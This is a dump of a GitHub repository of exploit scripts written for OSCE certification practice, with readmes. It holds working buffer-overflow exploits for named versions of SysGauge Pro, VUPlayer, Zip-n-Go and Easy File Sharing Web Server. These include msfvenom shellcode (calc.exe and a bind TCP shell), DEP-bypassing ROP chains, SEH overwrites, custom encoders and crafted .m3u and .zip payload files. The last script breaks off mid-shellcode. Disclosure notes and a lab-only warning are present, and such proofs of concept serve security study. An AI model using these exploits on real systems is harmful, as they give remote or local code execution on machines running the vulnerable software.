\"\\x25\\x10\\x10\\x10\\x10\\x25\\x01\\x01\\x01\\x01\\x05\\x31\\x70\\x03\\x34\\x05\\x22\\x70\\x06\\x33\\x50\"\n\n# the program converts \"\\xff\" to \"c3\" [retn instruction] thus popping previously pushed to the stack address \"jmp esp\" to eip ;)\nbuffer += \"\\xff\"\nbuffer += \"C\" * (50000-780-4-4-28-21-21-26-22-21-21-21-21-25-1)    ### junk \ntry:\n    f=open(\"payload.txt\",\"w\")\n    print \"[+] Creating %s bytes evil payload..\" %len(buffer)\n    f.write(buffer)\n    f.close()\n    print \"[+] File created!\"\nexcept:\n    print \"File cannot be created\""
  },
  {
    "path": "Local Buffer Overflow/SysGaugeProv4.6.12/readme.md",
    "content": "### SysGauge Pro v4.6.12\nStructured Exception Handler (SEH) chain overwrite exploit found during my prep to take on OSCE. A custom shellcode/encoder was needed to bypass the bad-character limitations (the Register dialog only accepts bytes 0x00-0x7f, excluding 0x00, 0x09, 0x0a and 0x0d). Note that the WinExec() address is hard-coded for Windows XP SP3 kernel32.dll and the pop/pop/ret and jmp esp gadgets come from the bundled libdgg.dll and QtCore4.dll, so the payload must be re-based for any other target. See the link [EDB-ID: 44455](https://www.exploit-db.com/exploits/44455/)\n\n![alt text](https://github.com/ihack4falafel/OSCE/blob/master/Local%20Buffer%20Overflow/SysGaugeProv4.6.12/PoC.gif)\n"
  },
  {
    "path": "Local Buffer Overflow/VUPlayerv2.49/Exploit.py",
    "content": "#!/usr/bin/env python\r\n\r\nimport struct\r\nimport time\r\n\r\n#root@kali:~# msfvenom -p windows/exec CMD=calc.exe -b \"\\x00\\x09\\x0a\\x0d\\x1a\" -f python -v shellcode (227 bytes)\r\n \r\nshellcode  = \"\"\r\nshellcode += \"\\xbb\\xc7\\x16\\xe0\\xde\\xda\\xcc\\xd9\\x74\\x24\\xf4\\x58\\x2b\\xc9\\xb1\"\r\nshellcode += \"\\x33\\x83\\xc0\\x04\\x31\\x58\\x0e\\x03\\x9f\\x18\\x02\\x2b\\xe3\\xcd\\x4b\"\r\nshellcode += \"\\xd4\\x1b\\x0e\\x2c\\x5c\\xfe\\x3f\\x7e\\x3a\\x8b\\x12\\x4e\\x48\\xd9\\x9e\"\r\nshellcode += \"\\x25\\x1c\\xc9\\x15\\x4b\\x89\\xfe\\x9e\\xe6\\xef\\x31\\x1e\\xc7\\x2f\\x9d\"\r\nshellcode += \"\\xdc\\x49\\xcc\\xdf\\x30\\xaa\\xed\\x10\\x45\\xab\\x2a\\x4c\\xa6\\xf9\\xe3\"\r\nshellcode += \"\\x1b\\x15\\xee\\x80\\x59\\xa6\\x0f\\x47\\xd6\\x96\\x77\\xe2\\x28\\x62\\xc2\"\r\nshellcode += \"\\xed\\x78\\xdb\\x59\\xa5\\x60\\x57\\x05\\x16\\x91\\xb4\\x55\\x6a\\xd8\\xb1\"\r\nshellcode += \"\\xae\\x18\\xdb\\x13\\xff\\xe1\\xea\\x5b\\xac\\xdf\\xc3\\x51\\xac\\x18\\xe3\"\r\nshellcode += \"\\x89\\xdb\\x52\\x10\\x37\\xdc\\xa0\\x6b\\xe3\\x69\\x35\\xcb\\x60\\xc9\\x9d\"\r\nshellcode += \"\\xea\\xa5\\x8c\\x56\\xe0\\x02\\xda\\x31\\xe4\\x95\\x0f\\x4a\\x10\\x1d\\xae\"\r\nshellcode += \"\\x9d\\x91\\x65\\x95\\x39\\xfa\\x3e\\xb4\\x18\\xa6\\x91\\xc9\\x7b\\x0e\\x4d\"\r\nshellcode += \"\\x6c\\xf7\\xbc\\x9a\\x16\\x5a\\xaa\\x5d\\x9a\\xe0\\x93\\x5e\\xa4\\xea\\xb3\"\r\nshellcode += \"\\x36\\x95\\x61\\x5c\\x40\\x2a\\xa0\\x19\\xbe\\x60\\xe9\\x0b\\x57\\x2d\\x7b\"\r\nshellcode += \"\\x0e\\x3a\\xce\\x51\\x4c\\x43\\x4d\\x50\\x2c\\xb0\\x4d\\x11\\x29\\xfc\\xc9\"\r\nshellcode += \"\\xc9\\x43\\x6d\\xbc\\xed\\xf0\\x8e\\x95\\x8d\\x97\\x1c\\x75\\x7c\\x32\\xa5\"\r\nshellcode += \"\\x1c\\x80\"\r\n\r\nbuffer = \"HTTP://\" + \"\\x41\" * 1005\r\n\r\n###   ROP Chain for VirtualProtect()   ###\r\n#========================================#\r\n\r\n### stack pivot\r\nbuffer += struct.pack('<L', 0x1003a084)  # RETN (ROP NOP) [BASS.dll]\r\n\r\n### edx = NewProtect (0x40)\r\nbuffer += 
struct.pack('<L', 0x10015f82)  # POP EAX # RETN [BASS.dll]\r\nbuffer += struct.pack('<L', 0xffffffc0)  # value to negate, will become 0x00000040\r\nbuffer += struct.pack('<L', 0x10014db4)  # NEG EAX # RETN [BASS.dll]\r\nbuffer += struct.pack('<L', 0x10038a6d)  # XCHG EAX,EDX # RETN [BASS.dll]\r\n\r\n### ebx = dwSize (501)\r\nbuffer += struct.pack('<L', 0x10015f82)  # POP EAX # RETN [BASS.dll]\r\nbuffer += struct.pack('<L', 0xfffffaff)  # value to negate, will become 0x00000501\r\nbuffer += struct.pack('<L', 0x10014db4)  # NEG EAX # RETN [BASS.dll]\r\nbuffer += struct.pack('<L', 0x10032f72)  # XCHG EAX,EBX # RETN 0x00 [BASS.dll]\r\n\r\n### eax = ptr to &VirtualProtect()\r\nbuffer += struct.pack('<L', 0x10015f82)  # POP EAX # RETN [BASS.dll]               \r\nbuffer += struct.pack('<L', 0x1060e25c)  # ptr to &VirtualProtect() [BASSMIDI.dll]\r\n\r\n### ecx = lpOldProtect (ptr to writeable address)\r\nbuffer += struct.pack('<L', 0x101049ec)  # POP ECX # RETN [BASSWMA.dll] \r\nbuffer += struct.pack('<L', 0x101082db)  # &Writable location [BASSWMA.dll]\r\n\r\n### esp = lPAddress (automatic) aka shellcode\r\n\r\n### ebp = pop 4 bytes\r\nbuffer += struct.pack('<L', 0x10010157)  # POP EBP # RETN [BASS.dll] \r\nbuffer += struct.pack('<L', 0x10010157)  # skip 4 bytes [BASS.dll]\r\n\r\n### esi = ptr to jmp [eax]\r\nbuffer += struct.pack('<L', 0x1001d804)  # POP ESI # RETN [BASS.dll]\r\nbuffer += struct.pack('<L', 0x10101c02)  # JMP [EAX] [BASSWMA.dll]\r\n\r\n### edi = ROP NOP (RETN)\r\nbuffer += struct.pack('<L', 0x100190b0)  # POP EDI # RETN [BASS.dll]\r\nbuffer += struct.pack('<L', 0x1003a084)  # RETN (ROP NOP) [BASS.dll]\r\n\r\n### push register values to poor stack\r\nbuffer += struct.pack('<L', 0x1001d7a5)  # PUSHAD # RETN [BASS.dll]\r\nbuffer += struct.pack('<L', 0x1010539f)  # jmp esp in BASSWMA.dll universal\r\n\r\nbuffer += \"\\x90\" * 20                    # make space for shellcode decoder\r\nbuffer += shellcode                      # evil calc.exe \r\n\r\n### 
padding\r\nbuffer += \"\\x43\" * (20000-7-1005-(4*21)-20-len(shellcode))\r\n\r\ntry:\r\n\tf=open(\"OpenMe.m3u\",\"w\")\r\n\tprint \"[+] Creating %s bytes evil payload..\" %len(buffer)\r\n\ttime.sleep(1)\r\n\tf.write(buffer)\r\n\tf.close()\r\n\tprint \"[+] File created. Load that shit up!\"\r\nexcept:\r\n\tprint \"File cannot be created\""
  },
  {
    "path": "Local Buffer Overflow/VUPlayerv2.49/readme.md",
    "content": "### VUPlayer v2.49\nROP chain exploit that pops calc.exe by bypassing DEP on Windows XP SP3 with the Windows VirtualProtect() API; the payload is delivered through a crafted .m3u playlist (OpenMe.m3u). The chain is built from fixed-address gadgets in the bundled BASS.dll, BASSWMA.dll and BASSMIDI.dll modules, so it is tied to those library versions. \n\n![alt text](https://github.com/ihack4falafel/OSCE/blob/master/Local%20Buffer%20Overflow/VUPlayerv2.49/PoC.JPG)\n"
  },
  {
    "path": "Local Buffer Overflow/Zip-n-Gov4.9/Exploit.py",
    "content": "#!/usr/bin/python\r\n#----------------------------------------------------------------------------------------------------------#\r\n# Exploit Title      : Zip-n-Go v4.9 - Local Buffer Overflow (SEH)                                         #\r\n# Exploit Author     : Hashim Jawad - @ihack4falafel                                                       #\r\n# Vendor Homepage    : http://mc1soft.com/index.shtml                                                      #\r\n# Vulnerable Software: http://mc1soft.com/files/zip-n-go49old.exe                                          #\r\n# Tested on          : Windows 7 Enterprise - SP1 (x86)                                                    #\r\n#----------------------------------------------------------------------------------------------------------#\r\n\r\n# Disclosure Timeline:\r\n# ====================\r\n# 05-28-18: Contacted vendor, no response \r\n# 05-30-18: Contacted vendor again, responded with patch and requested further testing\r\n# 05-30-18: Patch did not seem to fix the problem and alternative approach were suggested\r\n# 05-31-18: Vendor applied new patch and requested further testing\r\n# 05-31-18: The new patch nullified the vulnerability\r\n# 06-03-18: Version 4.95 was released  \r\n# 06-03-18: Proof of concept exploit published\r\n\r\n#root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\\x00\\x0a\\x0d' -e x86/alpha_mixed BufferRegister=EAX -f python -v shellcode\r\n#Payload size: 710 bytes\r\nshellcode =  \"\"\r\nshellcode += \"\\x50\\x59\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\"\r\nshellcode += \"\\x49\\x49\\x49\\x49\\x49\\x49\\x37\\x51\\x5a\\x6a\\x41\\x58\"\r\nshellcode += \"\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\"\r\nshellcode += \"\\x32\\x42\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\"\r\nshellcode += \"\\x42\\x75\\x4a\\x49\\x39\\x6c\\x5a\\x48\\x6e\\x62\\x43\\x30\"\r\nshellcode += 
\"\\x45\\x50\\x73\\x30\\x61\\x70\\x6d\\x59\\x7a\\x45\\x46\\x51\"\r\nshellcode += \"\\x39\\x50\\x72\\x44\\x4e\\x6b\\x52\\x70\\x30\\x30\\x6c\\x4b\"\r\nshellcode += \"\\x52\\x72\\x56\\x6c\\x6c\\x4b\\x73\\x62\\x37\\x64\\x4c\\x4b\"\r\nshellcode += \"\\x32\\x52\\x51\\x38\\x54\\x4f\\x6f\\x47\\x31\\x5a\\x61\\x36\"\r\nshellcode += \"\\x50\\x31\\x79\\x6f\\x4c\\x6c\\x35\\x6c\\x31\\x71\\x51\\x6c\"\r\nshellcode += \"\\x47\\x72\\x46\\x4c\\x71\\x30\\x59\\x51\\x5a\\x6f\\x44\\x4d\"\r\nshellcode += \"\\x56\\x61\\x6b\\x77\\x38\\x62\\x69\\x62\\x72\\x72\\x43\\x67\"\r\nshellcode += \"\\x6e\\x6b\\x43\\x62\\x32\\x30\\x6c\\x4b\\x33\\x7a\\x55\\x6c\"\r\nshellcode += \"\\x6c\\x4b\\x32\\x6c\\x34\\x51\\x34\\x38\\x6d\\x33\\x37\\x38\"\r\nshellcode += \"\\x57\\x71\\x4a\\x71\\x66\\x31\\x6c\\x4b\\x42\\x79\\x51\\x30\"\r\nshellcode += \"\\x65\\x51\\x59\\x43\\x4c\\x4b\\x52\\x69\\x45\\x48\\x6b\\x53\"\r\nshellcode += \"\\x77\\x4a\\x47\\x39\\x4e\\x6b\\x76\\x54\\x4e\\x6b\\x46\\x61\"\r\nshellcode += \"\\x58\\x56\\x36\\x51\\x59\\x6f\\x6e\\x4c\\x49\\x51\\x4a\\x6f\"\r\nshellcode += \"\\x76\\x6d\\x35\\x51\\x68\\x47\\x57\\x48\\x49\\x70\\x62\\x55\"\r\nshellcode += \"\\x48\\x76\\x56\\x63\\x31\\x6d\\x4a\\x58\\x55\\x6b\\x73\\x4d\"\r\nshellcode += \"\\x35\\x74\\x33\\x45\\x4b\\x54\\x52\\x78\\x6c\\x4b\\x46\\x38\"\r\nshellcode += \"\\x51\\x34\\x56\\x61\\x59\\x43\\x33\\x56\\x6c\\x4b\\x76\\x6c\"\r\nshellcode += \"\\x50\\x4b\\x4e\\x6b\\x46\\x38\\x75\\x4c\\x67\\x71\\x68\\x53\"\r\nshellcode += \"\\x6c\\x4b\\x34\\x44\\x4e\\x6b\\x47\\x71\\x78\\x50\\x4b\\x39\"\r\nshellcode += \"\\x47\\x34\\x57\\x54\\x55\\x74\\x33\\x6b\\x33\\x6b\\x55\\x31\"\r\nshellcode += \"\\x31\\x49\\x50\\x5a\\x42\\x71\\x4b\\x4f\\x4b\\x50\\x31\\x4f\"\r\nshellcode += \"\\x31\\x4f\\x72\\x7a\\x4c\\x4b\\x54\\x52\\x6a\\x4b\\x6c\\x4d\"\r\nshellcode += \"\\x31\\x4d\\x62\\x48\\x46\\x53\\x50\\x32\\x77\\x70\\x43\\x30\"\r\nshellcode += \"\\x72\\x48\\x70\\x77\\x30\\x73\\x35\\x62\\x43\\x6f\\x50\\x54\"\r\nshellcode += 
\"\\x70\\x68\\x72\\x6c\\x71\\x67\\x67\\x56\\x47\\x77\\x49\\x6f\"\r\nshellcode += \"\\x68\\x55\\x6e\\x58\\x4c\\x50\\x43\\x31\\x45\\x50\\x53\\x30\"\r\nshellcode += \"\\x46\\x49\\x78\\x44\\x33\\x64\\x62\\x70\\x50\\x68\\x76\\x49\"\r\nshellcode += \"\\x4f\\x70\\x42\\x4b\\x43\\x30\\x69\\x6f\\x69\\x45\\x73\\x5a\"\r\nshellcode += \"\\x67\\x78\\x31\\x49\\x42\\x70\\x6a\\x42\\x59\\x6d\\x71\\x50\"\r\nshellcode += \"\\x32\\x70\\x73\\x70\\x36\\x30\\x70\\x68\\x78\\x6a\\x36\\x6f\"\r\nshellcode += \"\\x69\\x4f\\x6d\\x30\\x6b\\x4f\\x69\\x45\\x4f\\x67\\x63\\x58\"\r\nshellcode += \"\\x47\\x72\\x47\\x70\\x36\\x71\\x31\\x4c\\x6c\\x49\\x59\\x76\"\r\nshellcode += \"\\x70\\x6a\\x74\\x50\\x31\\x46\\x61\\x47\\x45\\x38\\x4f\\x32\"\r\nshellcode += \"\\x69\\x4b\\x54\\x77\\x35\\x37\\x79\\x6f\\x6a\\x75\\x66\\x37\"\r\nshellcode += \"\\x51\\x78\\x4d\\x67\\x39\\x79\\x37\\x48\\x59\\x6f\\x39\\x6f\"\r\nshellcode += \"\\x6a\\x75\\x62\\x77\\x61\\x78\\x43\\x44\\x68\\x6c\\x37\\x4b\"\r\nshellcode += \"\\x68\\x61\\x69\\x6f\\x4a\\x75\\x70\\x57\\x5a\\x37\\x52\\x48\"\r\nshellcode += \"\\x74\\x35\\x32\\x4e\\x52\\x6d\\x45\\x31\\x39\\x6f\\x4a\\x75\"\r\nshellcode += \"\\x71\\x78\\x71\\x73\\x30\\x6d\\x32\\x44\\x65\\x50\\x4f\\x79\"\r\nshellcode += \"\\x69\\x73\\x36\\x37\\x32\\x77\\x36\\x37\\x70\\x31\\x7a\\x56\"\r\nshellcode += \"\\x51\\x7a\\x56\\x72\\x53\\x69\\x36\\x36\\x7a\\x42\\x49\\x6d\"\r\nshellcode += \"\\x43\\x56\\x78\\x47\\x33\\x74\\x31\\x34\\x37\\x4c\\x67\\x71\"\r\nshellcode += \"\\x46\\x61\\x6e\\x6d\\x53\\x74\\x34\\x64\\x62\\x30\\x6a\\x66\"\r\nshellcode += \"\\x65\\x50\\x71\\x54\\x66\\x34\\x52\\x70\\x72\\x76\\x36\\x36\"\r\nshellcode += \"\\x32\\x76\\x31\\x56\\x70\\x56\\x30\\x4e\\x53\\x66\\x52\\x76\"\r\nshellcode += \"\\x31\\x43\\x32\\x76\\x52\\x48\\x64\\x39\\x38\\x4c\\x65\\x6f\"\r\nshellcode += \"\\x4f\\x76\\x49\\x6f\\x78\\x55\\x4b\\x39\\x49\\x70\\x50\\x4e\"\r\nshellcode += \"\\x53\\x66\\x31\\x56\\x79\\x6f\\x34\\x70\\x50\\x68\\x65\\x58\"\r\nshellcode += 
\"\\x4e\\x67\\x57\\x6d\\x63\\x50\\x79\\x6f\\x38\\x55\\x4d\\x6b\"\r\nshellcode += \"\\x68\\x70\\x78\\x35\\x6d\\x72\\x62\\x76\\x72\\x48\\x6d\\x76\"\r\nshellcode += \"\\x4d\\x45\\x6f\\x4d\\x4f\\x6d\\x39\\x6f\\x4b\\x65\\x37\\x4c\"\r\nshellcode += \"\\x77\\x76\\x71\\x6c\\x46\\x6a\\x6f\\x70\\x39\\x6b\\x4d\\x30\"\r\nshellcode += \"\\x74\\x35\\x33\\x35\\x6f\\x4b\\x61\\x57\\x77\\x63\\x52\\x52\"\r\nshellcode += \"\\x50\\x6f\\x32\\x4a\\x73\\x30\\x32\\x73\\x6b\\x4f\\x78\\x55\"\r\nshellcode += \"\\x41\\x41\"\r\n\r\n####################### ZIP File Structure ######################## \r\n###################################################################\r\n######################## Local File Header ########################\r\nLocalFileHeader  = '\\x50\\x4b\\x03\\x04' # local file header signature\r\nLocalFileHeader += '\\x14\\x00'         # version needed to extract 0x14 = 20 -> 2.0\r\nLocalFileHeader += '\\x00\\x00'         # general purpose bit flag\r\nLocalFileHeader += '\\x00\\x00'         # compression method\r\nLocalFileHeader += '\\xb7\\xac'         # file last modification time 0xacb7 -> H=21 M=37 S=23 -> 21:37:23\r\nLocalFileHeader += '\\xce\\x34'         # file last modification date 0x34ce -> D=3 M=6 Y=2006 -> 2006/6/3\r\nLocalFileHeader += '\\x00\\x00\\x00'     # CRC-32 '\\x00' was left out to make sure we hit 25 bytes before file length\r\nLocalFileHeader += '\\x00\\x00\\x00\\x00' # compressed size\r\nLocalFileHeader += '\\x00\\x00\\x00\\x00' # uncompressed size\r\nLocalFileHeader += '\\xe4\\x0f'         # file name length 0x0fe4 = 4068 bytes \r\nLocalFileHeader += '\\x00\\x00'         # extra field length\r\nLocalFileHeader += '\\x00'             # file name\r\n#LocalFileHeader += '\\x00'             # extra filed \r\n################## Central Directory File Header ##################\r\nCDFileHeader     = '\\x50\\x4b\\x01\\x02' # cd file header signature \r\nCDFileHeader    += '\\x14\\x00'         # version made by 0x14 = 20 -> 2.0\r\nCDFileHeader    += 
'\\x14\\x00'         # version needed to extract 0x14 = 20 -> 2.0\r\nCDFileHeader    += '\\x00\\x00'         # general purpose bit flag\r\nCDFileHeader    += '\\x00\\x00'         # compression method \r\nCDFileHeader    += '\\xb7\\xac'         # file last modification time 0xacb7 -> H=21 M=37 S=23 -> 21:37:23\r\nCDFileHeader    += '\\xce\\x34'         # file last modification date 0x34ce -> D=3 M=6 Y=2006 -> 2006/6/3\r\nCDFileHeader    += '\\x00\\x00\\x00\\x00' # CRC-32\r\nCDFileHeader    += '\\x00\\x00\\x00\\x00' # compressed size\r\nCDFileHeader    += '\\x00\\x00\\x00\\x00' # uncompressed size\r\nCDFileHeader    += '\\xe4\\x0f'         # file name length 0x0fe4 = 4068 bytes\r\nCDFileHeader    += '\\x00\\x00'         # extra field length\r\nCDFileHeader    += '\\x00\\x00'         # file comment length \r\nCDFileHeader    += '\\x00\\x00'         # disk number where file starts\r\nCDFileHeader    += '\\x01\\x00'         # internal file attributes BIT 0: apparent ASCII/text file\r\nCDFileHeader    += '\\x24\\x00\\x00\\x00' # external file attributes \r\nCDFileHeader    += '\\x00\\x00\\x00\\x00' # relative offset of local file header\r\n#CDFileHeader    += '\\x00'             # file name\r\n#CDFileHeader    += '\\x00'             # extra field \r\n#CDFileHeader    += '\\x00'             # file comment \r\n################ End of Central Directory Record ##################\r\nEOCDRHeader      = '\\x50\\x4b\\x05\\x06' # End of central directory signature\r\nEOCDRHeader     += '\\x00\\x00'         # number of this disk \r\nEOCDRHeader     += '\\x00\\x00'         # disk where central directory starts \r\nEOCDRHeader     += '\\x01\\x00'         # number of central directory records on this disk \r\nEOCDRHeader     += '\\x01\\x00'         # total number of central directory records \r\nEOCDRHeader     += '\\x12\\x10\\x00\\x00' # size of central directory 0x1012 = 4114 bytes\r\nEOCDRHeader     += '\\x02\\x10\\x00\\x00' # offset of start of central directory, relative to 
start of archive \r\nEOCDRHeader     += '\\x00\\x00'         # comment length \r\n#EOCDRHeader     += '\\x00'             # comment \r\n \r\nWitchcraft  = '\\x54'                      # PUSH ESP          * save stack pointer\r\nWitchcraft += '\\x5F'                      # POP EDI\r\nWitchcraft += '\\x54'                      # PUSH ESP          * calculate offset for decoder  \r\nWitchcraft += '\\x58'                      # POP EAX\r\nWitchcraft += '\\x05\\x11\\x21\\x11\\x11'      # ADD EAX,11112111\r\nWitchcraft += '\\x05\\x11\\x21\\x11\\x11'      # ADD EAX,11112111\r\nWitchcraft += '\\x2D\\x53\\x25\\x22\\x22'      # SUB EAX,22222553\r\nWitchcraft += '\\x50'                      # PUSH EAX\r\nWitchcraft += '\\x5C'                      # POP ESP\r\n\r\n#https://github.com/ihack4falafel/Slink\r\n#root@kali:/opt/Slink# python Slink.py                        * decode the following 'nop;mov esp, edi;mov eax, edi;add eax, 58c;jmp eax'\r\n#Enter your shellcode: 9089FC89F8058C050000FFE0\r\n#[+] Shellcode size is divisible by 4\r\n#[+] Encoding [e0ff0000]..\r\n#[!] [01] and/or [f] and/or [00] found, using alterantive encoder..\r\nWitchcraft += \"\\x25\\x4A\\x4D\\x4E\\x55\" ## and  eax, 0x554e4d4a\r\nWitchcraft += \"\\x25\\x35\\x32\\x31\\x2A\" ## and  eax, 0x2a313235\r\nWitchcraft += \"\\x05\\x11\\x11\\x77\\x61\" ## add  eax, 0x61771111\r\nWitchcraft += \"\\x05\\x11\\x11\\x66\\x51\" ## add  eax, 0x51661111\r\nWitchcraft += \"\\x05\\x11\\x11\\x55\\x61\" ## add  eax, 0x61551111\r\nWitchcraft += \"\\x2D\\x33\\x33\\x33\\x33\" ## sub  eax, 0x33333333\r\nWitchcraft += \"\\x50\"                 ## push eax\r\n#[+] Encoding [058c05f8]..\r\n#[!] 
[01] and/or [f] and/or [00] found, using alterantive encoder..\r\nWitchcraft += \"\\x25\\x4A\\x4D\\x4E\\x55\" ## and  eax, 0x554e4d4a\r\nWitchcraft += \"\\x25\\x35\\x32\\x31\\x2A\" ## and  eax, 0x2a313235\r\nWitchcraft += \"\\x05\\x74\\x13\\x46\\x13\" ## add  eax, 0x13461374\r\nWitchcraft += \"\\x05\\x64\\x13\\x45\\x13\" ## add  eax, 0x13451364\r\nWitchcraft += \"\\x05\\x53\\x12\\x34\\x12\" ## add  eax, 0x12341253\r\nWitchcraft += \"\\x2D\\x33\\x33\\x33\\x33\" ## sub  eax, 0x33333333\r\nWitchcraft += \"\\x50\"                 ## push eax\r\n#[+] Encoding [89fc8990]..\r\n#[!] [01] and/or [f] and/or [00] found, using alterantive encoder..\r\nWitchcraft += \"\\x25\\x4A\\x4D\\x4E\\x55\" ## and  eax, 0x554e4d4a\r\nWitchcraft += \"\\x25\\x35\\x32\\x31\\x2A\" ## and  eax, 0x2a313235\r\nWitchcraft += \"\\x05\\x41\\x44\\x76\\x44\" ## add  eax, 0x44764441\r\nWitchcraft += \"\\x05\\x41\\x44\\x65\\x44\" ## add  eax, 0x44654441\r\nWitchcraft += \"\\x05\\x41\\x34\\x54\\x34\" ## add  eax, 0x34543441\r\nWitchcraft += \"\\x2D\\x33\\x33\\x33\\x33\" ## sub  eax, 0x33333333\r\nWitchcraft += \"\\x50\"                 ## push eax\r\n\r\nEvil  = '\\x41' * 3066                     # offset to shellcode \r\nEvil += shellcode                         # bind shell  \r\nEvil += '\\x43' * (716-len(shellcode))     # shellcode host\r\nEvil += Witchcraft                        # magic! 
\r\nEvil += '\\x42' * (126-len(Witchcraft))    # witchcraft host\r\nEvil += '\\x74\\x80\\x75\\x80'                # nSEH - short jump backward (jump net)\r\nEvil += '\\x6e\\x4c\\x40\\x00'                # SEH  - pop ecx, pop ebp, retn in zip-n-go.exe \r\nEvil += '\\x41' * (4064-3908-4-4)\r\nEvil += '.txt'\r\n\r\nbuffer  = LocalFileHeader\r\nbuffer += Evil\r\nbuffer += CDFileHeader\r\nbuffer += Evil\r\nbuffer += EOCDRHeader  \r\n\r\ntry:\r\n\tf=open(\"Evil.zip\",\"w\")\r\n\tprint \"[+] Creating %s bytes evil payload..\" %len(Evil)\r\n\tf.write(buffer)\r\n\tf.close()\r\n\tprint \"[+] File created!\"\r\nexcept Exception as e:\r\n\tprint e"
  },
  {
    "path": "Local Buffer Overflow/Zip-n-Gov4.9/README.md",
    "content": "### Zip-n-Go v4.9\nStructured Exception Handler (SEH) overwrite exploit found while studying ZIP file headers; the overflow is triggered by an over-long file name inside a crafted archive (Evil.zip). The vendor was notified and the issue is fixed in version 4.95 (see the disclosure timeline in Exploit.py). See the link [EDB-ID: 44828](https://www.exploit-db.com/exploits/44828/)\n\n<p align=\"center\">\n  <img src=\"https://github.com/ihack4falafel/OSCE/blob/master/Local%20Buffer%20Overflow/Zip-n-Gov4.9/PoC.gif\">\n</p>\n"
  },
  {
    "path": "README.md",
    "content": "# OSCE\nSome of the sploits and tools made during my journey to take on OSCE. Mostly useless.. These are proof-of-concept exploits for specific old versions of the listed software; run them only against your own lab machines. \n\n\n<p align=\"center\">\n  <img  height=500 width=900 src=\"https://media.giphy.com/media/Uno27COfoYlH2/giphy.gif\">\n</p>\n\n<p align=\"center\">\nWith persistence and patience comes success\n</p>\n"
  },
  {
    "path": "Remote Buffer Overflow/EasyFileSharingWebServerv7.2/Exploit.py",
    "content": "#!/usr/bin/env python\n#---------------------------------------------------------------------------------------------------#\n# Exploit Title   : Easy File Sharing Web Server 7.2 - 'UserID' Remote Buffer Overflow (DEP Bypass) #\n# Date            : 04/24/2018                                                                      #\n# Exploit Author  : Hashim Jawad                                                                    #\n# Twitter         : @ihack4falafel                                                                  #\n# Author Website  : ihack4falafel[.]com                                                             #\n# Vendor Homepage : http://www.sharing-file.com/                                                    #\n# Software Link   : http://www.sharing-file.com/efssetup.exe                                        #\n# Original Exploit: https://www.exploit-db.com/exploits/44485/                                      #\n# Tested on       : Windows 7 Enterprise (x86) - Service Pack 1                                     # \n#---------------------------------------------------------------------------------------------------#\n\nimport requests\nimport struct\nimport time\n\nhost='192.168.80.148'\nport='80'\n\n# badchars = \"\\x00\\x7e\\x2b\\x26\\x3d\\x25\\x3a\\x22\\x0a\\x0d\\x20\\x2f\\x5c\\x2e\"\n# root@kali:~# msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -v shellcode -f python\n# Payload size: 447 bytes\n\nshellcode =  \"\"\nshellcode += \"\\x89\\xe3\\xd9\\xe5\\xd9\\x73\\xf4\\x5a\\x4a\\x4a\\x4a\\x4a\"\nshellcode += \"\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a\\x43\\x43\\x43\\x43\\x43\"\nshellcode += \"\\x43\\x37\\x52\\x59\\x6a\\x41\\x58\\x50\\x30\\x41\\x30\\x41\"\nshellcode += \"\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42\\x30\\x42\"\nshellcode += \"\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\\x49\"\nshellcode += \"\\x6c\\x6b\\x58\\x4e\\x62\\x63\\x30\\x57\\x70\\x77\\x70\\x53\"\nshellcode += 
\"\\x50\\x6e\\x69\\x6b\\x55\\x64\\x71\\x39\\x50\\x50\\x64\\x6e\"\nshellcode += \"\\x6b\\x42\\x70\\x64\\x70\\x6c\\x4b\\x43\\x62\\x36\\x6c\\x6e\"\nshellcode += \"\\x6b\\x43\\x62\\x75\\x44\\x6e\\x6b\\x52\\x52\\x64\\x68\\x46\"\nshellcode += \"\\x6f\\x38\\x37\\x50\\x4a\\x76\\x46\\x64\\x71\\x4b\\x4f\\x4e\"\nshellcode += \"\\x4c\\x77\\x4c\\x35\\x31\\x61\\x6c\\x77\\x72\\x76\\x4c\\x37\"\nshellcode += \"\\x50\\x4a\\x61\\x5a\\x6f\\x74\\x4d\\x37\\x71\\x39\\x57\\x38\"\nshellcode += \"\\x62\\x5a\\x52\\x30\\x52\\x66\\x37\\x6e\\x6b\\x50\\x52\\x62\"\nshellcode += \"\\x30\\x6c\\x4b\\x62\\x6a\\x57\\x4c\\x6c\\x4b\\x52\\x6c\\x47\"\nshellcode += \"\\x61\\x74\\x38\\x6d\\x33\\x71\\x58\\x43\\x31\\x38\\x51\\x50\"\nshellcode += \"\\x51\\x6c\\x4b\\x33\\x69\\x67\\x50\\x35\\x51\\x48\\x53\\x6e\"\nshellcode += \"\\x6b\\x57\\x39\\x75\\x48\\x69\\x73\\x54\\x7a\\x63\\x79\\x4e\"\nshellcode += \"\\x6b\\x35\\x64\\x6c\\x4b\\x35\\x51\\x6a\\x76\\x46\\x51\\x39\"\nshellcode += \"\\x6f\\x6e\\x4c\\x6f\\x31\\x48\\x4f\\x44\\x4d\\x36\\x61\\x48\"\nshellcode += \"\\x47\\x34\\x78\\x6b\\x50\\x74\\x35\\x69\\x66\\x73\\x33\\x73\"\nshellcode += \"\\x4d\\x49\\x68\\x55\\x6b\\x43\\x4d\\x47\\x54\\x74\\x35\\x68\"\nshellcode += \"\\x64\\x63\\x68\\x4e\\x6b\\x46\\x38\\x66\\x44\\x33\\x31\\x59\"\nshellcode += \"\\x43\\x61\\x76\\x6c\\x4b\\x66\\x6c\\x50\\x4b\\x4c\\x4b\\x50\"\nshellcode += \"\\x58\\x47\\x6c\\x65\\x51\\x69\\x43\\x6c\\x4b\\x63\\x34\\x6e\"\nshellcode += \"\\x6b\\x43\\x31\\x68\\x50\\x4e\\x69\\x61\\x54\\x65\\x74\\x65\"\nshellcode += \"\\x74\\x51\\x4b\\x51\\x4b\\x73\\x51\\x73\\x69\\x62\\x7a\\x42\"\nshellcode += \"\\x71\\x69\\x6f\\x39\\x70\\x51\\x4f\\x73\\x6f\\x43\\x6a\\x4e\"\nshellcode += \"\\x6b\\x52\\x32\\x78\\x6b\\x4e\\x6d\\x31\\x4d\\x53\\x5a\\x67\"\nshellcode += 